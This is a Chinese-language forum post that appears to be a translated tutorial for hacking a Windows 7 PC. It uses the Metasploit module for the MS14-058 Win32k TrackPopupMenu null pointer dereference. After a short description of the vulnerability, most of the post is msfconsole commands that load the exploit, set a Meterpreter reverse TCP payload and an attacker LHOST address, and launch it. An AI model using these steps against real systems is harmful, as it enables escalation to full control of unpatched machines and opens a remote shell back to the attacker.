黑客远程Windows PC使用Windows轨道弹出菜单Win32k空指针解除引用

weiweihack 于 2018-11-14 23:27 编辑了帖子
此模块利用win32k.sys中的NULL指针解除引用,可以通过使用TrackPopupMenu触发漏洞。在特殊情况下,可以在xxxSend MessageTimeout上滥用NULL指针取消引用,以实现任意代码执行。此模块已在Windows XP SP3,Windows 2003 SP2,Windows 7 SP1和Windows 2008 32位上成功测试过。也适用于Windows 7 SP1和Windows 2008 R2 SP1 64位。


利用目标

Windows 7的


需求

攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole

现在输入  exploit use / windows / local / ms14_058_track_popup_menu
msf exploit (ms14_058_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms14_058_track_popup_menu)>set lhost 192.168.0.111 (IP of Local Host)
msf exploit (ms14_058_track_popup_menu)>set session 1
msf exploit (ms14_058_track_popup_menu)>exploit
转载请注明本文链接: http://www.mayidui.net/t2401.html
话题: 任意代码执行
游客
登录后才可以回帖,登录 或者 注册